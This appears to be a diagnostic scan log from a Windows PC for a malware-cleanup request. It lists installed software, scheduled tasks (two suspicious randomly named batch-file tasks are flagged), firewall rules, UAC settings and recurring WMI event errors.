AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-1345210596-781569937-2744199837-1000\...\uTorrent) (Version: 3.5.1.44332 - BitTorrent Inc.)
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.009.20050 - Adobe Systems Incorporated)
Adobe Flash Player 28 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 28.0.0.137 - Adobe Systems Incorporated)
Adobe Photoshop Lightroom 4.3 64-bit (HKLM\...\{D759947B-8C5A-4480-B0DB-FC391F061C85}) (Version: 4.3.1 - Adobe)
Ant Video downloader (Native messaging host) (HKLM-x32\...\{C7B24B38-A9D0-4F6D-A028-8C90DB8F2D85}) (Version: 3.1.24 - Ant.com)
Applian Network Monitor (3.0.8.1) (HKLM-x32\...\Applian Network Monitor) (Version: 3.0.8.1 - Applian Technologies)
Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 17.9.2322 - AVAST Software)
Blitzkrieg 2 (HKLM-x32\...\1207664013_is1) (Version: 2.1.0.14 - GOG.com)
Blitzkrieg Anthology (HKLM-x32\...\Blitzkrieg Anthology_is1) (Version:  - GOG.com)
Carmageddon: Reincarnation (HKLM-x32\...\Carmageddon: Reincarnation_is1) (Version:  - )
Chrome Token Signing (HKLM\...\{98F4FF09-5CAF-494A-A67F-C48081CCDF9C}) (Version: 1.0.6.485 - RIA) Hidden
DigiDoc3 Client (HKLM-x32\...\{188E6E99-CE30-4060-9CDF-E97ADFCB3CF4}) (Version: 3.13.3.1512 - RIA) Hidden
eID software (HKLM-x32\...\{d23663a7-6af7-4a3f-a7ec-458e9d3ac442}) (Version: 17.10.0.1757 - RIA)
Enable S3 for USB Device (HKLM-x32\...\Enable S3 for USB Device) (Version:  - )
EstEID Minidriver (HKLM\...\{C8FD6A29-41A0-49CB-AB5B-96598235E4FD}) (Version: 3.12.0.77 - RIA) Hidden
EstEID Shell Extension (HKLM\...\{BB120379-55D5-4774-8B4D-81D9DD16353C}) (Version: 3.13.3.1512 - RIA) Hidden
EstEID Shell Extension (HKLM-x32\...\{B5D2ABF7-F3B8-44A3-A10D-A15DEF2F644D}) (Version: 3.13.3.1512 - RIA) Hidden
FF Token Signing Uninstaller (HKLM-x32\...\{DE25D1DE-8D29-4C37-9C70-2EFFC87EEC64}) (Version: 17.10.0.1757 - RIA) Hidden
Firefox PKCS11 Loader (HKLM\...\{31C58AB3-490E-48A9-9B45-98DA934CACEA}) (Version: 3.12.1.1070 - RIA) Hidden
Fraps (HKLM-x32\...\Fraps) (Version:  - )
Heroes of Might and Magic 4 Complete (HKLM-x32\...\Heroes of Might and Magic 4 Complete_is1) (Version:  - GOG.com)
ID-card utility (HKLM-x32\...\{6C6BE759-429F-406D-9887-CA469A8287FA}) (Version: 3.12.9.1261 - RIA) Hidden
IE Token Signing Plugin (HKLM\...\{92C0E129-C2A7-44F3-955C-AE90D0916337}) (Version: 3.13.0.987 - RIA) Hidden
Intel® Chipset Device Software (HKLM-x32\...\{619e726e-d2b4-4e28-9568-c964fd81ee6c}) (Version: 10.1.1.14 - Intel® Corporation) Hidden
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.0.1016 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.4.225 - Intel Corporation)
IrfanView 4.50 (32-bit) (HKLM-x32\...\IrfanView) (Version: 4.50 - Irfan Skiljan)
K-Lite Codec Pack 12.5.0 Full (HKLM-x32\...\KLiteCodecPack_is1) (Version: 12.5.0 - KLCP)
Malwarebytes version 3.3.1.2183 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.3.1.2183 - Malwarebytes)
Microsoft .NET Framework 4.6.1 Hotfix Rollup (KB3154529) (HKLM\...\{5B71B4F6-A412-3C48-B332-0FA9B9958940}) (Version: 4.6.01081 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729 (HKLM\...\{14297226-E0A0-3781-8911-E9D529552663}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{CA8A885F-E95B-3FC6-BB91-F4D9377C7686}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
ModifyRegistry version 0.1 (HKLM-x32\...\{1D5BE6B5-7FD4-4A78-90F2-AF6B53BC8C1C}_is1) (Version: 0.1 - VIA Technologies, Inc.)
Morrowind (HKLM-x32\...\{C325F588-D6B1-4A7F-B6A2-914C75DDA348}) (Version:  - )
Morrowind Graphics Extender 3.3.2 (HKLM-x32\...\Morrowind Graphics Extender_is1) (Version:  - Timeslip)
MozBackup 1.5.1 (HKLM-x32\...\MozBackup) (Version:  - Pavel Cvrcek)
Mozilla Firefox 57.0.4 (x64 en-US) (HKLM\...\Mozilla Firefox 57.0.4 (x64 en-US)) (Version: 57.0.4 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 54.0.1 - Mozilla)
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.63.10 - Black Tree Gaming)
NVIDIA 3D Vision Controller Driver 306.97 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 306.97 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 306.97 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 306.97 - NVIDIA Corporation)
NVIDIA Graphics Driver 306.97 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 306.97 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.18.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.18.0 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.12.0604 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.12.0604 - NVIDIA Corporation)
NVIDIA Update 1.10.8 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 1.10.8 - NVIDIA Corporation)
Open-EID Metapackage (HKLM-x32\...\{480CC672-1E8A-44B3-BF21-0A378662DD22}) (Version: 17.10.0.1757 - RIA) Hidden
Open-EID QtConf Uninstaller (HKLM-x32\...\{433CCE35-D98B-4ADA-B604-7DCEBC8B09A8}) (Version: 17.10.0.1757 - RIA) Hidden
Open-EID Uninstaller (HKLM-x32\...\{CFB5249C-8910-4154-A306-C43774C90530}) (Version: 17.10.0.1757 - RIA) Hidden
Open-EID Updater (HKLM-x32\...\{A60ADF43-9579-4670-93FC-6D23BD2A8F1C}) (Version: 3.12.2.1012 - RIA) Hidden
Platform (HKLM-x32\...\{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.40 - VIA Technologies, Inc.) Hidden
PowerISO (HKLM-x32\...\PowerISO) (Version: 6.5 - Power Software Ltd)
Ralink RT2870 Wireless LAN Card (HKLM-x32\...\{28DA7D8B-F9A4-4F18-8AA0-551B1E084D0D}) (Version: 1.5.24.0 - Ralink)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.88.617.2014 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6662 - Realtek Semiconductor Corp.)
Replay Media Catcher 6 (6.0.0.70) (HKLM-x32\...\Replay Media Catcher 6) (Version: 6.0.0.70 - Applian Technologies)
SafeZone Stable 1.51.2220.53 (HKLM-x32\...\SafeZone 1.51.2220.53) (Version: 1.51.2220.53 - Avast Software) Hidden
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.14.0 - SAMSUNG Electronics Co., Ltd.)
Spintires v.03.03.16 (HKLM-x32\...\Spintires v.03.03.16_is1) (Version: Spintires v.03.03.16 - Darius)
Zemana AntiMalware (HKLM-x32\...\{8F0CD7D1-42F3-4195-95CD-833578D45057}_is1) (Version: 2.74.0.150 - Zemana Ltd.)
TeRa Client (HKLM\...\{3EC73B3C-9905-46C8-A654-2CBF0152A90A}) (Version: 1.0.0.219 - RIA) Hidden
TES Construction Set (HKLM-x32\...\{DB3C800B-081B-4146-B4E3-EFB5B77AA913}) (Version:  - )
The 4Th Coming 1.72 (HKLM-x32\...\The 4Th Coming 1.72) (Version: 1.72 - DialSoft)
WavePad Sound Editor (HKLM-x32\...\WavePad) (Version: 6.61 - NCH Software)
VIA Platform Device Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.40 - VIA Technologies, Inc.)
VideoPad Video Editor (HKLM-x32\...\VideoPad) (Version: 5.20 - NCH Software)
Windows Driver Package - RIA (Estonian National ID Card) (UMPass) SmartCard  (09/21/2017 3.12.0.77) (HKLM\...\0F673E6BE49AB7389244AD28CBFB79163DA20A7E) (Version: 09/21/2017 3.12.0.77 - RIA (Estonian National ID Card))
VLC media player (HKLM\...\VLC media player) (Version: 2.2.8 - VideoLAN)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-12-22] (AVAST Software)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-12-22] (AVAST Software)
ContextMenuHandlers1: [2.0 Zemana AntiMalware] -> {6ABB1C11-E261-4CEA-BBB5-3836225689DD} => C:\Program Files (x86)\Zemana AntiMalware\ZAMShellExt64.dll [2018-01-10] ()
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov)
ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-12-22] (AVAST Software)
ContextMenuHandlers1: [DigiDoc3ShellExtension] -> {310AAB39-76FE-401B-8A7F-0F578C5F6AB5} => C:\Program Files\Open-EID\EsteidShellExtension.dll [2017-10-24] (RIA)
ContextMenuHandlers1: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2016-02-10] (Power Software Ltd)
ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-12-22] (AVAST Software)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-11-01] (Malwarebytes)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov)
ContextMenuHandlers4: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2016-02-10] (Power Software Ltd)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2012-10-02] (NVIDIA Corporation)
ContextMenuHandlers6: [2.0 Zemana AntiMalware] -> {6ABB1C11-E261-4CEA-BBB5-3836225689DD} => C:\Program Files (x86)\Zemana AntiMalware\ZAMShellExt64.dll [2018-01-10] ()
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov)
ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-12-22] (AVAST Software)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-11-01] (Malwarebytes)
ContextMenuHandlers6: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2016-02-10] (Power Software Ltd)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {09B877A5-E470-40D9-B8AA-2B741994CC08} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-09-27] (Adobe Systems Incorporated)
Task: {13B7508E-9F15-46F3-8FCA-B08191E5A004} - System32\Tasks\SafeZone scheduled Autoupdate 1478538427 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe
Task: {6C430DDE-4ADF-4922-B91E-872CCAC5D507} - System32\Tasks\PSEWDZ => C:\Users\Jahikas\oFIF.exe [2016-06-12] (Microsoft Corporation)
Task: {85FB7A0B-0200-4CF4-A545-AA1C0CBF65A3} - System32\Tasks\SyHTyUPcnUkIY => C:\Program Files (x86)\bFmsiuYoOoOvL.bat [2009-07-14] () <==== ATTENTION
Task: {98C651FF-B20D-4DAE-8C2B-75BC6AB62AC0} - System32\Tasks\hYOuioDYluo => C:\Windows\SysWOW64\hicAAmW.bat [2009-07-14] () <==== ATTENTION
Task: {9FAF999F-B1C0-4EB6-8FB8-E8D3FF1F251C} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\avast software\overseer\overseer.exe [2018-01-06] (AVAST Software)
Task: {B1A3E979-9F87-468A-85BD-150518122937} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2017-12-22] (AVAST Software)
Task: {B59E3446-4F64-4481-835A-8D4A8FFA5FE0} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-01-09] (Adobe Systems Incorporated)
Task: {CF60FBBC-E160-4749-B9B1-8A980ABEFE0D} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


Shortcut: C:\Users\Jahikas\Favorites\NCH Software Download Site.lnk -> hxxp://www.nchsoftware.com/index.htm

==================== Loaded Modules (Whitelisted) ==============

2016-11-07 21:27 - 2012-10-02 21:51 - 000086888 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2018-01-10 03:37 - 2018-01-10 03:37 - 000155504 _____ () C:\Program Files (x86)\Zemana AntiMalware\ZAMShellExt64.dll
2016-11-07 16:48 - 2014-12-12 17:24 - 000044760 _____ () C:\Windows\runSW.exe
2017-12-22 09:18 - 2017-12-22 09:18 - 000067920 _____ () c:\Program Files\AVAST Software\Avast\x64\module_lifetime.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000067984 _____ () C:\Program Files\AVAST Software\Avast\x64\dll_loader.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000236840 _____ () c:\Program Files\AVAST Software\Avast\x64\vaarclient.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000902824 _____ () C:\Program Files\AVAST Software\Avast\x64\ffl2.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000349568 _____ () c:\Program Files\AVAST Software\Avast\x64\StreamBack.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000337096 _____ () C:\Program Files\AVAST Software\Avast\x64\tasks_core.dll
2016-11-07 23:07 - 2016-11-07 23:07 - 002760704 _____ () C:\Program Files (x86)\The4ThComing\t4c.exe
2017-12-22 09:18 - 2017-12-22 09:18 - 000058016 _____ () C:\Program Files\AVAST Software\Avast\module_lifetime.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000057504 _____ () C:\Program Files\AVAST Software\Avast\dll_loader.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000206152 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000289272 _____ () C:\Program Files\AVAST Software\Avast\tasks_core.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000196248 _____ () C:\Program Files\AVAST Software\Avast\network_notifications.dll
2018-01-10 21:15 - 2018-01-10 21:15 - 005768336 _____ () C:\Program Files\AVAST Software\Avast\defs\18011006\algo.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000745408 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000148936 _____ () C:\Program Files\AVAST Software\Avast\hns_tools.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000293944 _____ () C:\Program Files\AVAST Software\Avast\streamback.dll
2017-07-05 07:40 - 2017-07-05 07:40 - 067109376 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000282560 _____ () C:\Program Files\AVAST Software\Avast\gaming_mode_ui.dll
2016-11-07 16:34 - 2013-09-16 12:17 - 001242584 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2016-11-09 11:20 - 2015-10-24 19:00 - 003502592 _____ () C:\Program Files (x86)\K-Lite Codec Pack\Filters\ffdshow\ffdshow.ax

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 04:34 - 2009-06-10 23:00 - 000000824 _____ C:\Windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1345210596-781569937-2744199837-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Jahikas\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{6E89D580-3909-42D4-990C-8EC57310F6ED}] => (Allow) C:\PROGRA~2\REALTEK\USBWIR~1\RtWlan.exe
FirewallRules: [{D980AE09-1BCC-4438-8EA1-F149E7C47AE7}] => (Allow) LPort=1542
FirewallRules: [{2B6A94AA-899C-46EC-A9B3-ABC4EA37E4EB}] => (Allow) LPort=1542
FirewallRules: [{34D2E829-56AC-4DA5-8CAA-FF634AF5C495}] => (Allow) LPort=53
FirewallRules: [{ECC1DD69-8180-4766-B632-0F3E45DAB3A4}] => (Allow) C:\PROGRA~2\REALTEK\USBWIR~1\Rtldhcp.exe
FirewallRules: [{10575CE0-A8FA-4AA9-AF0F-455B6CBF02F4}] => (Allow) C:\Program Files (x86)\Realtek\USB Wireless LAN Utility\RTLDHCP.exe
FirewallRules: [{BED1FA9A-13AB-4E2D-9702-F80BF58B3340}] => (Allow) C:\Program Files (x86)\Realtek\USB Wireless LAN Utility\RTLDHCP.exe
FirewallRules: [{A5B0EB42-F37E-405E-A634-35FE31B60DB1}] => (Allow) LPort=53
FirewallRules: [{04E516BE-E325-4979-B3C5-BD5D0DD6C4A2}] => (Allow) C:\Program Files (x86)\Realtek\USB Wireless LAN Utility\RTLDHCP.exe
FirewallRules: [{D193E981-9730-46FE-B812-0F7512DB38BC}] => (Allow) C:\Program Files (x86)\Realtek\USB Wireless LAN Utility\RTLDHCP.exe
FirewallRules: [{ABD68125-C1D8-4406-A81F-E3ED01F25E87}] => (Allow) C:\Program Files (x86)\Realtek\USB Wireless LAN Utility\RTLDHCP.exe
FirewallRules: [{CC284204-65F7-4F33-B1BC-888D7090C4BF}] => (Allow) C:\Program Files (x86)\Realtek\USB Wireless LAN Utility\RTLDHCP.exe
FirewallRules: [{AFBE3B18-E923-49C9-AD50-0A7287C41912}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{FA5E0B69-71F7-4663-B4AE-CD2F6589027E}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{9954E21B-B921-449D-AA09-580A7E644742}] => (Allow) C:\Users\Jahikas\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{B1089BEE-49E1-4163-97B8-75013617AE18}] => (Allow) C:\Users\Jahikas\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{0FAA9E94-C4A8-496B-8C9D-11F21CCBD125}] => (Allow) C:\Users\Jahikas\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{573A0AE5-30A1-4541-9DC8-11ED6C2D9287}] => (Allow) C:\Users\Jahikas\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{2D80F3F8-19C8-4C39-947E-A2E4173AF7F4}] => (Allow) C:\Users\Jahikas\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{ADB2BE84-167B-40D0-BD2D-6D586E64AB7E}] => (Allow) C:\Users\Jahikas\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{2441EF7A-A683-4CC9-8C65-2151E892BE7E}] => (Allow) C:\Program Files (x86)\Applian Technologies\Replay Media Catcher 6\jrmcp.exe
FirewallRules: [{F1EA65E6-3EF5-404F-9AD1-A4E42744AB20}] => (Allow) C:\Program Files (x86)\Applian Technologies\Replay Media Catcher 6\jrmcp.exe
FirewallRules: [{3F51EC47-E54F-4BA6-9D32-ACA862A969CF}] => (Allow) C:\Program Files (x86)\Applian Technologies\Replay Media Catcher 6\jbp.exe
FirewallRules: [{4C48A25E-2900-4754-AEC6-1CACAF145387}] => (Allow) C:\Program Files (x86)\Applian Technologies\Replay Media Catcher 6\jbp.exe
FirewallRules: [{8BE74C25-9CF4-4BCB-B47C-53E1FB017D1B}] => (Allow) C:\Program Files (x86)\Applian Technologies\Replay Media Catcher 6\ffmpeg.exe
FirewallRules: [{9C3B1EB8-5926-482C-9F44-08DFAC462E90}] => (Allow) C:\Program Files (x86)\Applian Technologies\Replay Media Catcher 6\ffmpeg.exe
FirewallRules: [{69AED78A-1AD1-4A84-99B6-2B3540A35624}] => (Allow) C:\Program Files (x86)\Applian Technologies\Replay Media Catcher 6\dl.exe
FirewallRules: [{7F79B3F2-BD63-41F5-9799-79296A33CA24}] => (Allow) C:\Program Files (x86)\Applian Technologies\Replay Media Catcher 6\dl.exe
FirewallRules: [{75690DC6-E1E4-40E6-9FA7-F5DA2D96005E}] => (Allow) C:\Program Files (x86)\Applian Technologies\Replay Media Catcher 6\aria2c.exe
FirewallRules: [{0C9A931C-AEEA-421E-AD59-BEFA2BDE2380}] => (Allow) C:\Program Files (x86)\Applian Technologies\Replay Media Catcher 6\aria2c.exe
FirewallRules: [{B8D60E08-3271-495C-BE1E-F56E7156C69A}] => (Allow) C:\Program Files (x86)\Applian Technologies\Replay Media Catcher 6\qtCopy.exe
FirewallRules: [{AA6A8495-6618-43F8-A94D-B18A78FA8EF0}] => (Allow) C:\Program Files (x86)\Applian Technologies\Replay Media Catcher 6\qtCopy.exe
FirewallRules: [TCP Query User{BCF5A69E-2779-439D-AF3D-766724F9684D}D:\games\counter-strike cs 1.6 p47\hl.exe] => (Allow) D:\games\counter-strike cs 1.6 p47\hl.exe
FirewallRules: [UDP Query User{E3D6BECD-4D34-4AB1-9607-73F9D7834D2B}D:\games\counter-strike cs 1.6 p47\hl.exe] => (Allow) D:\games\counter-strike cs 1.6 p47\hl.exe
FirewallRules: [TCP Query User{6D2E162D-C600-4DF6-8D5E-47A16D647D6D}D:\games\spintires\spintires v.03.03.16\spintires.exe] => (Allow) D:\games\spintires\spintires v.03.03.16\spintires.exe
FirewallRules: [UDP Query User{EEDE19F0-0EE1-4A11-9BB2-9149CAAB3142}D:\games\spintires\spintires v.03.03.16\spintires.exe] => (Allow) D:\games\spintires\spintires v.03.03.16\spintires.exe
FirewallRules: [TCP Query User{8AC06605-2722-4181-8405-C2EA1510DF9C}D:\games\resident evil 6\bh6.exe] => (Block) D:\games\resident evil 6\bh6.exe
FirewallRules: [UDP Query User{3B55B096-E13B-4698-A75A-C441D57C4257}D:\games\resident evil 6\bh6.exe] => (Block) D:\games\resident evil 6\bh6.exe
FirewallRules: [{53F1A585-3CAD-452E-86D6-FB23C1F935D8}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{299C05B9-6175-471D-8494-C361CFC56A67}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{811A007E-AF7A-408F-9CBB-11D4BA7B223A}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe

==================== Restore Points =========================

10-01-2018 04:51:20 Scheduled Checkpoint

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (01/11/2018 08:32:51 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/10/2018 09:46:43 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/10/2018 09:15:32 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/10/2018 03:38:50 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/10/2018 03:08:35 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/10/2018 07:46:43 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/10/2018 03:48:41 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

